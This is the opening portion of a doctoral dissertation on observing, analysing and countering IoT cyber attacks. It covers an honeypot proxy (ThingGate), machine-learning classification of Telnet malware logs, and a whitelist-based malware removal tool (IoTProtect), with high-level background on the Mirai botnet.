Upload
others
View
1
Download
0
Embed Size (px)
Citation preview
A Study on Observation, Analysis, and Countermeasure of
Cyber Attacks in IoT
IoT におけるサイバー攻撃の観測、分析、および対
策に関する研究
By
CHUNJUNG WU
December, 2019
A doctoral dissertation submitted to
the Graduate School of Environment and Information Sciences,
Yokohama National University
Principal Advisor: Professor Tsutomu MATSUMOTO
i
Acknowledgement
First, I would like to express the deepest appreciation to my principal supervisor, Professor
Tsutomu Matsumoto, who has a genius attitude and substance: he constantly and convincingly
conveys the prudence and hard work of research. Without his guidance and persistent help, this
dissertation would not have been possible. I am incredibly grateful to Associate Professor
Katsunari Yoshioka, who taught me how to conduct cybersecurity research and write technical
papers. Without his leading, discussion, and support, I would not be able to finish my study. I also
gratefully acknowledge Professors Junji Shikata, whose intelligent comment and advice
significantly contributed to my research.
I would like to thank Professors Tatsunori Mori and Lecturer Shinichi Shirakawa for serving
on my dissertation committee. Their valuable comments were extremely constructive. Special
thanks go to Dr. Shin-Ying Huang from the Institute for Information Industry for insightful
discussion and beneficial collaboration. Special thanks go to Dr. Erwan Le Malecot for the critical
comments and help on the network infrastructure.
I am also indebted to the past and present members of the Matsumoto Laboratory, Shikata
Laboratory, and Yoshioka Laboratory. I learned a lot and got very much help from them. I also
appreciate the help from the secretaries of the Matsumoto Laboratory and Yoshioka Laboratory.
Ms. Mio Narimatsu, Ms. Tomoko Ishidate, Ms. Kumiko Nakayama, Ms. Kiyono Yoshitani, and
Ms. Emiko Kawamura. Their kindness supported me to graduate at Yokohama National
University.
Finally, I would like to thank my parents for their support and give me the chance to study at
Yokohama National University. I acknowledge everyone who helped me during my campus life.
ii
Abstract
In recent years, cyber attacks in IoT become increasingly rampant. Mirai Botnets executed the
massive distributed denial of service (DDoS) attack against Dyn DNS in 2016. The report from
Kaspersky in Sept. 2018, shows Mirai is still the most popular IoT malware family for
cybercriminals (20.9%). Besides, the IoT malware keeps evolving and exploits multiple
vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families
that assimilate many known exploits affecting the Internet of Things (IoT) devices. These exploits
come from 11 makers' devices over HTTP, UPnP, Telnet, and SOAP protocols. Despite malware,
human attackers also utilize various tools to access and collect variable information on the device.
For instances, web UI of IP Cameras and routers are constantly searched and accessed if
vulnerable. Hence the observation tool of cyber attacks in IoT should be reconsidered and
evaluated. In order to observe and analyze such a variety of attacks in depth, there is an increasing
need for bare-metal IoT devices as a honeypot, since it iss costly to emulate device-specific
vulnerabilities and complex functionalities from dedicated services. However, operating bare-
metal IoT honeypots has unique technical challenges, mostly coming from their low
configurability as an embedded system, and bringing management and information leak problems.
In chapter 3, we introduce frequent cyber attacks against IoT. Also, then we describe an
observation and analysis framework and countermeasure of cyber attacks in IoT. First is
techniques to support honeypot consisted of physical IoT devices. A bare-metal honeypot needs
proper access control while it is allowing attackers to access its inside to some degree, such as
filter out bricking commands and changes of critical configuration. The MITM proxy can control
incoming and outbound traffic of the honeypot, filter out unwanted attack flow, and prevent
information leak. Second is techniques of analyzing massive data of IoT honeypot. We apply text-
mining and machine learning algorithms to find new attack vector and categorized known Botnets'
iii
attacks. The third is a whitelisting-based countermeasure against cyber attacks in IoT. Despite
introducing the functionality, we showed how to protect the IoT devices in the honeypot from
unwanted cyber attacks. Also, we proposed a novel approach on how to create an appropriate
view which analyzes the incoming data in depth and utilize our resource efficiently. Finally, we
showed a method to recognize and remove the IoT malware process by examining the pathname
and binaries hash value hidden in "/proc" folder.
In chapter 4, we combine the ability of the transparent proxy and web tracking library, develop
a supporting mechanism for honeypot consisted of physical IoT devices. ThingGate can improve
the management ability of honeypot, extend the functionality of web tracking, manage the
incoming traffic, and output response content via MITM way. We evaluate ThingGate with seven
bare-metal IoT devices. The experiment results show that it successfully blocks unwanted
incoming attacks, masks wireless access point information of the devices, and tracks attackers on
the device web UI while showing high observability of various attacks exploiting different
vulnerabilities.
A drastic increase in cyber attacks targeting the Internet of Things (IoT) devices using telnet
protocols has been observed since 2016. Kaspersky report estimated that Telnet protocol is still
the primary attack vectors of cyber attacks in IoT (75%) in Sept. 2018. Therefore, in chapter 5,
we proposed a novel method based on malware binaries, command sequences, and meta-features
to analyzed 22.9GB Telnet log and 5,616 different malware binaries collected by IoT honeypot in
284 days. We employ both unsupervised or supervised learning algorithms and text-mining
algorithms for handling unstructured data. Clustering analysis is applied for finding malware
family members and revealing their inherent features for a better explanation. First, the malware
binaries are grouped using similarity analysis. Then, we extract key patterns of interaction
behavior using an N-gram model. We also train a multiclass classifier to identify IoT malware
iv
categories based on common infection behavior. For misclassified subclasses, second-stage sub-
training is performed using a file meta-feature. Our results demonstrate 96.70% accuracy, with
high precision and recall. The result indicates that even for a dataset spanning nine months, our
method remained valid. Although command sequences can change many times, the use of trigram
features can accurately distinguish Mirai, Bashlite, and Hajime malware, based on differences in
their infection command patterns. The clustering results reveal variant attack vectors and one
denial of service (DoS) attack that used pure Linux commands.
Many Internet-of-Things (IoT) devices, such as home routers and Internet Protocol (IP)
cameras, have been compromised through infection by malware as a consequence of weak
authentication and other vulnerabilities. Malware infection can lead to functional disorders and/or
misuse of these devices in cyber attacks of various kinds. However, unlike personal computers
(PCs), low-cost IoT devices lack rich computational resources, with the result that conventional
protection mechanisms, such as signature-based anti-virus software, cannot be used. In chapter 6,
we present IoTProtect, a light-weight and whitelist-based protection mechanism that can be
deployed easily on existing commercial products with very little modification of their firmware.
IoTProtect uses a whitelist to check processes running on IoT devices and terminate unknown
processes periodically. Our experiments using four low-cost IoT devices and 4,981 in-the-wild
malware binaries show that IoTProtect successfully terminated 99.92% of the processes created
by the binaries within 44 seconds after their infection with central processing unit (CPU) overhead
of 24% and disk space overhead of 288 KB.
v
Table of Contents Acknowledgement ......................................................................................................................... i Abstract ......................................................................................................................................... ii Table of Contents ......................................................................................................................... v List of Figures ............................................................................................................................ viii List of Tables ................................................................................................................................ ix Chapter 1. Introduction ............................................................................................................... 1
1.1. Motivations and Contributions ........................................................................................... 1 1.2. Organization ........................................................................................................................ 4
Chapter 2. Background and related work ................................................................................. 5 2.1 Internet of Things ................................................................................................................. 5 2.2. Cyber attacks in IoT ............................................................................................................ 5
2.2.1. Botnets ......................................................................................................................... 5 2.2.2. Cyber attacks against WebUI of Physical IoT Devices ............................................... 7
2.3. Related works of honeypot consist of physical IoT devices ............................................... 8 2.4. Related works of Malware Analysis through machine learning ......................................... 9 2.5. Related works of countermeasure against cyber attacks in IoT ........................................ 11
Chapter 3. Observation, Analysis, and Countermeasure of cyber attacks in IoT ............... 14 3.1. Observation of cyber attacks in IoT .................................................................................. 15 3.2. Analysis of cyber attacks in IoT ........................................................................................ 17 3.3. Countermeasure of cyber attacks in IoT ........................................................................... 18
Chapter 4. ThingGate: A gateway for flexible operation of bare-metal IoT honeypot ....... 20 4.1. Introduction ....................................................................................................................... 20 4.2. Definitions ......................................................................................................................... 21
4.2.1. Man-in-the-middle ..................................................................................................... 21 4.2.2. Transparent Proxy ...................................................................................................... 22 4.2.3. Browser fingerprinting ............................................................................................... 22 4.2.4. Cyber attacks against WebUI of Physical IoT Devices ............................................. 22
4.3. ThingGate ......................................................................................................................... 23 4.3.1. System goal ................................................................................................................ 23 4.3.3. System Architecture and Modules ............................................................................. 26
4.4. Evaluation ......................................................................................................................... 30 4.4.1. Prototype and dataset ................................................................................................. 30 4.4.2. Cyber attacks against the WebUI of physical IoT devices ......................................... 33 4.4.3. Blocking unwanted flow experiments ....................................................................... 34 4.4.4. Web tracking experiments .......................................................................................... 36
vi
4.4.5. Managing misplaced attacks experiments ................................................................. 39 4.4.6. Fabricated sensor information experiment ................................................................. 42 4.4.7. Stress testing against IoT devices .............................................................................. 44
4.5. Discussion ......................................................................................................................... 45 4.5.1. Limitations ................................................................................................................. 46
Chapter 5. IoT Malware Analysis and New Pattern Discovery Through Sequence Analysis
Using Meta-Feature Information ............................................................................................. 47 5.1. Introduction ....................................................................................................................... 47 5.2. Methods............................................................................................................................. 49
5.2.1 Preliminaries ............................................................................................................... 49 5.2.2. Encoding and measurement of command sequences ................................................. 52 5.2.3. Data analysis .............................................................................................................. 58
5.3. Experiments ...................................................................................................................... 61 5.3.1. Dataset and Environment ........................................................................................... 61 5.3.2. Clustering Experiments .............................................................................................. 63 5.3.3. Classification Experiments ........................................................................................ 65
5.4. Discussion ......................................................................................................................... 67 Chapter 6. IoTProtect: Highly Deployable Whitelist-based Protection for Low-cost
Internet-of-Things Devices ........................................................................................................ 70 6.1. Introduction ....................................................................................................................... 70 6.2. Preliminaries ..................................................................................................................... 72
6.2.1. Linux processes information ...................................................................................... 72 6.2.2. Files in IoT devices .................................................................................................... 74 6.2.3. Major premises of IoTProtect .................................................................................... 77
6.3. IoTProtect ......................................................................................................................... 78 6.4. Evaluation ......................................................................................................................... 81
6.4.1. Data collection and experimental devices .................................................................. 81 6.4.2. Removal experiment .................................................................................................. 82 6.4.3. Mitigating outgoing attacks ....................................................................................... 84 6.4.4. Trade-off between security and device performance ................................................. 86 6.4.5. Evaluation of easy deployment .................................................................................. 88
6.5. Discussion ......................................................................................................................... 89 6.5.1. Comparison with previous studies ............................................................................. 91 6.5.2. Limitations ................................................................................................................. 92
Chapter 7. Conclusion and future works ................................................................................. 94 7.1 Conclusion ......................................................................................................................... 94
vii
7.2. Future works ..................................................................................................................... 96 Bibliography ............................................................................................................................... 97 List of Paper ............................................................................................................................. 109
Reviewed papers in Journals .................................................................................................. 109 Preparing to submit papers in Journals .................................................................................. 109 Technical Reports ................................................................................................................... 109
Appendix ................................................................................................................................... 110 Appendix A ............................................................................................................................ 110 Appendix B ............................................................................................................................ 111
viii
List of Figures Fig. 1 Lifecycle of Mirai Botnet [16]. .................................................................................... 7 Fig. 2 Flow of studying cyber attacks in IoT. ...................................................................... 15 Fig. 3 System overview of ThingGate ................................................................................. 25 Fig. 4 System Architecture of ThingGate ............................................................................ 27 Fig. 5 The processing flow of Request controller ................................................................ 28 Fig. 6 The encoded URL of CI-URL and decoded results ................................................... 29 Fig. 7 Downloaded Scripts from CI-URL ............................................................................ 30 Fig. 8 The HTTP request of a modifying configuration attack. ........................................... 36 Fig. 9 Web Tracking flow of ThingGate .............................................................................. 37 Fig. 10 Country distribution of fingerprinted clients ........................................................... 38 Fig. 11 Googlebot’s user-agent and the verifying result ...................................................... 38 Fig. 12 Vulnerability distribution of CI-URL ...................................................................... 40 Fig. 13 Statistic of malware labels ....................................................................................... 42 Fig. 14 Fabricated Wi-Fi AP list .......................................................................................... 43 Fig. 15 Trigram statistics of Bashlite IoT malware. ............................................................. 56 Fig. 16 Trigram statistics of Mirai IoT malware. ................................................................. 57 Fig. 17 Trigram statistics of Satori IoT malware. ................................................................ 57 Fig. 18 Data analysis flow ................................................................................................... 59 Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017 ................................ 64 Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March
2017.............................................................................................................................. 70 Fig. 21 Format of the maps [100] ........................................................................................ 74 Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200 ...................................................... 75 Fig. 23 Distribution of ASUS RT-AC3200 files .................................................................. 77 Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect
...................................................................................................................................... 85 Fig. 25 Results of experiment on mitigating outgoing attacks ............................................ 86 Fig. 26 Experimental environment for measuring the trade-off between performance and
security ......................................................................................................................... 87 Fig. 27 Results of experiment measuring trade-off ............................................................. 88
ix
List of Tables Table 1 IoT devices used in experiments. ............................................................................ 31 Table 2 Data set for analysis. ............................................................................................... 31 Table 3 HTTP method statistics for dataset 2. ..................................................................... 32 Table 4 Statistics of cyber attacks. Observation of 7 months.. ............................................ 33 Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP
Camera A1~A3, B, C, and D. ...................................................................................... 34 Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3. ........ 35 Table 7 Features of the fingerprinted clients. ....................................................................... 39 Table 8 Information of Vulnerabilities. Observation of 7 months from IP Camera A1~A3, B,
C, and D. ...................................................................................................................... 40 Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP
Camera A1~A3, B, C, and D. ...................................................................................... 43 Table 10 IoT devices used in experiments. .......................................................................... 45 Table 11 Comparison of labels and infection command sequence [4]. ................................ 50 Table 12 Top 5 antivirus engines for IoT malware. ............................................................. 51 Table 13 An example of the command mapping table. ........................................................ 52 Table 14 Distance measures for different malware labels (average). .................................. 55 Table 15 Distance measures for different malware labels (minimum). ............................... 55 Table 16 Distance measures for different n-gram between Bashlite and Mirai ................... 58 Table 17 Time cost for different n-gram between Bashlite and Mirai ................................. 58 Table 18 Dataset for analysis. .............................................................................................. 61 Table 19 Malware categories and ECTs' distribution. ......................................................... 62 Table 20 Statistics of time cost. ........................................................................................... 62 Table 21 Victims of Fileless DoS. ........................................................................................ 65 Table 22 Classification performance of even sampling- Naive Bayes. ............................... 65 Table 23 Classification performance of even sampling- SVM. ........................................... 66 Table 24 Classification performance of random sampling- Naive Bayes. ........................... 66 Table 25 Classification performance of random sampling- SVM. ...................................... 66 Table 26 Precision/recall of SVM – second stage (reinforcement learning). ...................... 67 Table 27 Commercial secure software against embedded systems. .................................... 71 Table 28 Table of symbols. .................................................................................................. 79 Table 29 IoT devices used in conducting the experiments. ................................................. 81 Table 30 IoT malware used for conducting the experiments. .............................................. 82 Table 31 Results of the removal experiments. ..................................................................... 83 Table 32 IoTProtect overheads. ........................................................................................... 84
x
Table 33 Cost of creating whitelists. .................................................................................... 88
1
Chapter 1.
Introduction
1.1. Motivations and Contributions
Over the past years, people have been connecting various things to the internet for monitoring,
collecting data, or remote manipulation. Backend applications collect and exchange data with
these devices through the network. This network of this appearance is called the internet of things
(IoT). Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is
projected to grow to 20.8 billion by 2020 [1]. Most IoT devices, however, utilize simple, low-
level hardware and antivirus and monitoring services are lacking. Moreover, many users were not
aware of changing the default credentials of admin accounts.
In Oct. 2016, an IoT Malware “Mirai” utilized a list of default credentials to login IoT devices
and grant root privilege. Also, it downloads malware binaries, conducts further infections, and
DDOS attacks. As a result, Mirai conducted the massive Distributed Denial of Service (DDOS)
attack against Dyn DNS. There are about 100,000 Mirai IoT Botnet nodes enlisted in this incident
and reported attack rates were up to 1.2 Tbps [2]. Therefore, cyber threats from IoT Botnet have
become a reality.
Further, IoT malware keeps evolving and exploits multiple vulnerabilities to infect IoT devices.
Since May 2018, the Mirai and Gafgyt malware families that assimilate multiple known exploits
affecting the Internet of Things (IoT) devices. These exploits come from 11 makers' devices over
HTTP, UPnP, Telnet, and SOAP protocols [3]. Besides the DDOS attack, new IoT malware has
diverse purposes including coin mining, click fraud, and sending spam emails. Nonetheless,
human attackers also utilize various tools to access and collect variable information on the device.
For examples, WebUI of many IP Cameras and routers are constantly searched and accessed if
2
vulnerable.
To observe cyber attacks against IoT devices and analyze the threats from IoT malware, some
researchers design new observation mechanisms and build various honeypots. These honeypots
include, for example, IoTPOT [4], SIPHON [5], IoTCandyJar [6], and real devices honeypot for
observing Web UI of IoT devices [7]. These honeypots successfully observed various cyber
attacks in IoT. However, some human-like attackers modify the configuration which impacts on
the effectiveness of honeypot such as changing network and updating the firmware. Besides, the
tremendous flow of cyber attacks in IoT raises an urgent necessity to develop a method which
analyzes the massive incoming data in depth and utilize resource efficiently. Moreover, we want
to find a solution for cyber attacks in IoT.
Based on the honeypot methodology and attack campaign of IoT malware, this dissertation
proposes three methods for observation, analysis, and countermeasure against cyber attacks in
IoT. The first method shows a control and protection mechanism for a bare-metal IoT honeypot.
Namely, a real IoT device, as a honeypot since it is costly to emulate device-specific
vulnerabilities and complicated functionalities provided through their WebUI and other dedicated
services, such as UPnP.
The first method focuses on managing the incoming traffic and response information of the
bare-metal IoT honeypot. We proposed ThingGate, which is a customized proxy between the
honeypot and internet transparently. ThingGate filtered out unwanted HTTP requests such as
deadly attack vectors and critical configuration change. Moreover, our program prevents the
leakage or exposure of sensitive information and injects fingerprinting JavaScript codes through
a man-in-the-middle (MITM) to track user clients. We utilize physical IoT devices as a honeypot,
and these devices are known to have been targeted by IoT malware. We cannot claim that the
honeypot can catch the whole attacks in IoT as we have only a limited number of devices for the
3
honeypot. There are some IoT viruses did not check targeted devices before they send malicious
HTTP requests. For the misplaced attack vectors which targeted IoT devices is not in our physical
IoT devices, the proxy redirects these vector to the analysis module to conduct further and real-
time analysis. With this approach, during 7 months of operation, our program successfully block
one critical configuration change attack. In addition, we collected 26 fingerprints of clients from
18 different source IPs. Besides, ThingGate sent fabricated Wi-Fi information to 44 different
clients who accessed the web page of Wi-Fi. ThingGate also analyzed 411 misplaced HTTP
requests, which contained 50 different URLs that exploited seven vulnerabilities. Moreover,
ThingGate successfully collected 150 different malware binaries and 23 scripts.
The second method focuses on applying machine learning techniques to analyze the observed
data from IoT honeypots. According to the report from Kaspersky in Sept. 2018, the most popular
attack and infection vector against devices remains the telnet service (75.4%) [8]. Thus the second
method targets the Telnet logs of the IoT honeypot. The method determines categories of malware
by analyzing its meta-features and command sequences. We extracted 2.7 million critical Telnet
logs from 22.9 GB Telnet log files. This approach mapped logs' commands to a smaller dataset
and performed classification and clustering analysis. Its contributions summarized as follows:
1. We proved that similar IoT malware binaries conduct similar infection commands. Moreover,
through similarity analysis of command sequences, we can identify the malware category of
unknown threats.
2. By clustering telnet logs, we discovered a new DoS cyber attack executed using pure Linux
commands, without IoT malware binaries.
3. Evaluating with 5,516 malware samples from the IoT honeypot, our proposed method could
identify four major malware categories with 96.70% accuracy.
The third method is a whitelisting method for protecting low-cost IoT devices. This method
4
checks binaries'md5 hash value and the pathname of user spaces processes. Moreover, then
remove the processes which are not in whitelists. We implemented a shell script prototype and
showed that it could be executed successfully on low-cost IoT devices, such as Wi-Fi routers and
storage, with marginal cost. We tested more than 4,981 different IoT malware binaries in four
different bare-metal IoT devices, and IoTProtect removed 99.92% of these malicious processes
successfully. For existing IoT devices, IoTProtect is an easy deployment application. The
installation procedure for the IoTProtect checker is very light and quick. The checker program is
written using Bash scripts, leading to portability between different Linux distributions. Moreover,
the fact that the size of the checker program is only 1.5 KB resulted in quick deployment on low-
cost IoT devices.
1.2. Organization
The rest of this dissertation is organized as follows. Chapter 2 presents the background and
related works. Chapter 3 describes the observation, analysis, and countermeasure of cyber attacks
in IoT. The methodology based on IoT honeypot consisted of physical IoT devices. Chapter 4
detailed the implementation of protect and management mechanism against IoT honeypot. This
approach focuses on preventing WebUI of physical IoT devices from information leak, unwanted,
and bricking attack. Chapter 5 discuss a novel analysis method towards the massive Telnet attack
vector logs for creating an in-depth view of cyber attacks in IoT. Chapter 6 discuss an IoT malware
removal method toward light-weight devices based on whitelisting. The dissertation concludes
with Chapter 7.
5
Chapter 2.
Background and related work
2.1 Internet of Things
The concept of a network of smart devices was discussed since 1982. There was a modified
Coke vending machine at Carnegie Mellon University, which became the first Internet-connected
appliance, be able to report its inventory and whether newly loaded drinks were cold or not [9].
In 1994, Reza Raji [10] described the concept in IEEE Spectrum as “moving small packets of
data to a large set of nodes, to integrate and automate everything from home appliances to entire
factories.”
The term “Internet of things” was likely coined by Kevin Ashton of MIT’s Auto-ID Center, in
1999, though he prefers the phrase “Internet for things.” At that point, he viewed Radio-frequency
identification (RFID) as essential to the Internet of things [11]. H., Eero, J., Grönvall, and K.,
Främling. Proposed an information system infrastructure for implementing smart, connected
objects mentioning the Internet of Things which more closely matches the modern IoT meaning
[12].
According to the Cisco Internet Business Solutions Group (IBSG), IoT formed in time when
more “things or objects” were connected to the Internet than people. Cisco Systems estimated that
the IoT was “born” between 2008 and 2009, with the things/people ratio growing from 0.08 in
2003 to 1.84 in 2010 [13].
2.2. Cyber attacks in IoT
2.2.1. Botnets
A Botnet is many Internet-connected devices, each of which is running one or more bots. Bots
are agent programs in compromised host machine which maintain access for attackers to control
6
them. Typically, a bot when installing on a victim machine establishes outbound connections to a
C&C server. Botnets can be used to perform distributed denial-of-service attack (DDoS attack),
steal data, send spam, and allows the attacker to access the device and its connection. The
botmaster can control the Botnet using command and control (C&C) software [14].
For Botnet malware, there are other malware families targeted IoT before Mirai such as
Bashlite [15]. While Mirai was the first IoT Botnet to emerge as a high-profile DDoS threat. In
2016, Mirai Botnet infected nearly 65,000 IoT devices in its first 20 hours before reaching a steady
state population of 200,000–300,000 infections [16]. Hence, we introduce the Mirai Botnet to
explain the Botnet attack campaign against IoT.
Fig. 1 shows the lifecycle of Mirai. From phase 1 Mirai asynchronously scans and "statelessly"
sent TCP SYN probes to pseudorandom IPv4 addresses, excluding those in a hard-coded IP
blacklist, on Telnet TCP ports 23 and 2323. If Mirai identifies a potential victim, it entered into a
brute-force login phase in which it attempted to establish a Telnet connection selected randomly
from a pre-configured list of 62 credentials. At the first successful login, Mirai sent the victim IP
and associated credentials to a hardcoded report server in phase 2. Report server dispatched victim
information to a loader in phase 3. A separate loader program infected these vulnerable devices
by downloading and executing architecture-specific malware in phase 4. With the operations from
phase 1 to phase 4, Mirai built the IoT Botnets. When the attacker wants to launch the DDoS
attack, the attacker sent commands to the C&C server in phase 5. The C&C server then relays the
commands to Bots in Botnets' devices in phase 6. Finally, these victim devices produce DDoS
flow and attack the DDoS Target in phase 7 [16].
7
Fig. 1 Lifecycle of Mirai Botnet [16].
2.2.2. Cyber attacks against WebUI of Physical IoT Devices
In 2017, Ezawa et al. [7] propose a Honeypot consisting of physical IoT devices to observe
cyber attacks against the WebUI of IoT devices. In 2018, Tamiya et al. [17] employed five IP
Cameras to build a decoy honeypot to capture the behavior of peeping attackers. According to
their observation, we summarized four kinds of cyber attacks against these WebUI:
1. Configuration information theft attacks
If the device contains vulnerabilities of information disclosure or weak credentials. The
attacker can collect the configuration and parameters of devices by some URLs, such as
get_status.cgi.
2. Modification of the configuration
Attackers may modify the DDNS, VPN, credentials, and network configuration which
impact the on the effectiveness of honeypot.
3. Snapshot attacks
Snapshot is a feature of IP Cameras and offers a current time image of the live stream
8
to users. Once the clients send the HTTP request of the snapshot, the web server will
provide the current time image in a JPG or PNG file.
4. Long term peeping
This attack collected by IP Cameras when some clients access the URL of the live stream.
Moreover, the clients stay on the web page of live streams for several hours.
2.3. Related works of honeypot consist of physical IoT devices
For observation of cyber attacks in IoT, researchers develop new tools and platform for
monitoring. In [5], Guarnizo et al. proposed the SIPHON architecture, which is a scalable high-
interaction honeypot platform for IoT devices. Our architecture leverages IoT devices physically
present at one location and connected to the Internet through so-called wormholes distributed
worldwide. The resulting architecture allows the exposure of a few physical devices over
numerous geographically distributed IP addresses.
Many embedded devices have WebUI for device management and operation, and some of them
are open to the Internet with vulnerability and weak credentials. Ezawa et al. [7] proposed the use
of a honeypot to monitor attacks against the WebUI of IoT devices by employing bare-metal
devices. The observation results contained attacks against regular web servers and indicated that
some attacks are automatically conducted through certain tools or types of malware. The
observation also suggests that some attackers changed the DDNS, VPN, and network settings,
resulting in the device becoming unavailable for other attackers.
Tamiya et al. [17] employed a decoy honeypot consisted of five IP Cameras to capture the
behavior of human-like attackers. His research shows the behavior including extracting
environment parameter of devices, downloading the snapshot of live streams, and long-term
peeping live streams.
Compared to existing literature, we find the previous honeypot of physical IoT devices lacks
9
abilities against sensitive information leaks and dangerous commands. Our work focuses on the
high interaction honeypot consisting of physical IoT devices. Our approach improves the security
of the honeypot, including protecting sensitive data collecting by sensors. Besides, our program
monitoring and manage the incoming traffic to avoid dangerous commands. Moreover, we
extended the web tracking function to WebUI of physical devices. Further, our setup allows us to
capture and analyze some misplaced attacks across different remote code execution vulnerabilities
in real-time.
2.4. Related works of Malware Analysis through machine learning
The IoT Botnets raised a massive attack flow against IoT devices all over the world, including
the IoT honeypot. IoT honeypot, such as IoTPOT successfully collected 124 million of attack
vector logs over Telnet protocol and 40,000 different malware binaries between 2015 and 2017.
To analyze the data in-depth and efficiently, we review the literature on the malware analysis
through machine learning. Yen et al. (2013) conducted an epidemiological study of malware
encountered in a large, multinational enterprise. They collected security and network
infrastructure logs to determine the key behavioral features of web-based malware. Moreover,
they used a logistical regression model to identify and rank the malware risk [18]. Masud, Khan,
and Thuraisingham presented a method of detecting malicious executables that combined three
types of features: binary N-grams, assembly instruction sequences, and dynamic-link library
function calls [19].
In 2015, Microsoft and Kaggle held the Malware Classification Challenge (BIG 2015), in
which Microsoft provided 20,000 Windows malware binary and assembler code files, with nine
categories of malware. Contestants had to classify the malware categories as well as possible. The
winning team extracted different features from the ASM file opcode and gathered pixel data from
malware disk images, then applied an N-gram algorithm to predict the malware category, thereby
10
achieving 99.7% accuracy. Ahmadi et al. subsequently used similar features to improve the
classification algorithm and achieve 99.8% accuracy with lower computational costs [20].
Drew, Moore, and Hahsler applies the Strand gene sequence classifier, which offers a robust
classification strategy that easily accommodates unstructured data, to malware classification.
Their method was used on approximately 500 GB of data to predict nine polymorphic malware
categories, and the results indicated that, with minimal adaptations, it achieved an accuracy of
well over 95% [21]. Most research has analyzed Windows-based malware and devised
experiments in MS Windows platforms.
For Linux/Unix malware, Shahzad and Farooq analyzed 709 Linux executable and linkable
format (ELF) files, extracting features from the ELF header and then applying machine-learning
classifiers to detect malware. Their method achieved 99% detection accuracy, with a false alarm
rate of less than 0.1% [22]. Bai et al. gathered features from ELF file system calls and tested four
classification algorithms (J48, Random Forests, AdboostM1, and IBK) for detecting Linux
malware, achieving a detection accuracy of approximately 98% [23].
Given that serious worm attacks have occurred through the Internet, Wang et al. proposed a
worm detection method based on mining dynamic program executions. They analyzed system
calls from MS Windows and Linux and traced system call sequences using a natural language
processing algorithm. They also applied the machine-learning algorithms Naive Bayes and
Support Vector Machines (SVM), with SVM achieving a 99.5% worm detection rate and a 2.22%
false positive rate [24].
For Android malware, Ham et al. [25] extracted features about the network, phone, message,
CPU, battery, and memory for each process in Android devices. They apply a linear SVM to
detect Android malware and compare the malware detection performance of SVM with that of
other machine learning classifiers. They show that the SVM outperforms other machine learning
11
classifiers with 0.995 Accuracy and 0.957 Precision.
Azmoodeh, Dehghantanha, and Choo [26] presented a deep learning based method to detect
Internet of Battlefield Things (IoBT) malware via the device’s Operational Code (OpCode)
sequence. They transmuted OpCodes into a vector space and apply a deep Eigenspace learning
approach to classify malicious and benign application. Their method could achieve 99.68%
accuracy and 98.37% recall.
Su et al. [27] proposed a novel lightweight method of detecting DDoS malware in IoT
environments. First, one-channel grayscale images converted from binaries were extracted, and
then a lightweight convolutional neural network was used to classify IoT malware families. The
experimental results indicated that this system could achieve 94.0% accuracy in goodware and
DDoS malware classification and 81.8% accuracy in classification of goodware and the two main
malware families.
Our study examined Linux malware. Its major difference from other research lay in the dataset.
We primarily analyzed shell commands from IoT malware, also examining the file meta-
information when necessary.
2.5. Related works of countermeasure against cyber attacks in IoT
According to the attack campaign of Mirai Botnet, we realized it is an urgent necessity to
develop a countermeasure for cyber attacks in IoT. Moreover, the countermeasure should be
applied for light-weight IoT devices. In this section we review the researches about whitelisting
solution for detecting malware.
Pareek, Romana, and Eswari consider that blacklisting-based solutions for detecting malware
suffer from problems of false positives and negatives. They share the idea of application
whitelisting that has been applied by security vendors and various other solutions. They also
12
provide details regarding design and implementation approaches and discuss challenges to
developing an effective whitelisting solution [28].
Obermeier, Schierholz, and Hristova apply whitelisting to applications for protecting industrial
automation and control systems. They find application whitelisting to be an effective means of
preventing the installation of malware [29]. Bhardwaj et al. developed a process monitoring
system based on blacklisting and whitelisting of process names [30]. Further, they developed an
application called “Debsums” to calculate the MD5 sums of an installed package and compare
them with those from existing processes [31]. However, an adversary can easily alter process
names and thus evade detection.
Paleari et al. present an architecture for automatic generation of procedures for recovery from
malicious programs. This method extracts the behavior of applications and monitors system calls
using QEMU, an emulator and monitor of virtual machines. In addition, they propose clustering
the behavior of malware to construct recovery procedures [32].
In 2011, Shahzad et al. proposed a classification-based method that analyzes a minimal feature
set of 11 features for distinguishing benign and malicious processes. This method provides 93%
detection accuracy with a 0% false alarm rate within 100 milliseconds [33].
In 2017, Tamiya et al. proposed a method for disinfecting IoT devices by merely rebooting or
resetting the infected devices [34]. Their experiments show that 45 existing IoT malware could
be erased by the simple operation of rebooting, but they did not present a detection method for
these malware binaries.
Koike et al. developed a whitelisting-based execution control technique called “WhiteEgret”
for the Linux operating system (OS). This module uses the bprm_check_security hook and the
mmap_file hook to monitor the absolute path of executable files. WhiteEgret permits execution
13
if the absolute path is contained in the whitelist and the hash value of the executable file is also
contained in the hash value whitelist [35].
As shown in the above literature review, there is no existing research on IoT cybersecurity
conducted on low-cost devices together with a process-level defense mechanism other than [35].
Moreover, all of the existing technologies require substantial modification of firmware and incur
a significant engineering cost if deployed on existing products. We propose a protection method
that is very light-weight and easy to deploy on existing low-cost IoT devices.
14
Chapter 3.
Observation, Analysis, and Countermeasure of cyber attacks
in IoT
This dissertation is about the research of cyber attacks in IoT. There are three phases in the
research and proposed one novel method in each phase. These three methods have no
dependencies and can be utilized individually. For research of cyber attacks, observation is the
first cornerstone of research. Many studies apply honeypot to observe cyber attacks in IoT. Some
of them choose virtual machines to emulate IoT devices. However, Emanuele et al. [36] proposed
research on analyzing 10,548 Linux malware binaries collected between Nov. 2016 and Nov. 2017.
They find 19 samples will detect Sandbox and 259 samples conduct process enumeration.
Therefore, some IoT malware may evade the IoT honeypot which consisted of virtual machines
in future. Besides, some cyber attacks targeted the physical IoT devices which are hard to emulate
by a virtual machine such as long-term peeping attack. As a result, our method focuses on physical
IoT devices. We build the honeypot by physical IoT devices and develop a proxy to solve the
problems from WebUI of physical IoT devices.
The next phase of research is to analyze the observation results in depth. We proposed a novel
analysis process that utilized machine learning techniques to analyze the attack data collected by
the IoT honeypot consisted of physical IoT devices. The last phase is to develop the
countermeasure against cyber attacks in IoT. According to the pattern and finding from analysis,
